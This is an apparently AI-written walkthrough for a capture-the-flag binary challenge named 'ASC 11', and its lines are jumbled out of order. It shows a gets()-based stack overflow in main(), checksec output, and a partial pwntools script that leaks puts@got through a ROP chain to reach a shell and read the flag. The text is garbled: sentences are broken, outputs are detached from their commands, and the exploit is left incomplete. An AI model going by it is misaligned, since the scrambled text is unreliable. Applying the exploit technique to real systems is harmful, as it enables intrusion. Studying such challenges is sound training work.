11 ~repack~ — Asc
./asc11
It prints "Input: ", waits for input, then exits. Open in Ghidra/IDA. The main function:
file asc11
checksec asc11
Output (example): asc 11
p.interactive()
Run exploit → shell → cat flag.txt. If you provide the actual binary and server info, I can tailor the exact exploit, offsets, and libc version. Does this match your ASC 11 challenge?
Here’s a (likely referring to the 11th Allied Security CTF challenge, or a similar “ASC” CTF / wargame).
from pwn import *

elf = ELF('./asc11')  # load the binary so GOT and symbol lookups resolve
p = process('./asc11')
offset = 40
# ROP to leak puts@got
rop = ROP(elf)
rop.puts(elf.got['puts'])
rop.call(elf.symbols['main'])
asc11: ELF 64-bit, dynamically linked, not stripped
Arch: amd64
RELRO: Partial
Stack: No canary found
NX: Enabled
PIE: Disabled
Run it to see behavior:
void main(void)
{
    char buf[32];
    setvbuf(stdout, NULL, 2, 0);
    puts("Input: ");
    gets(buf); // <-- vulnerable
}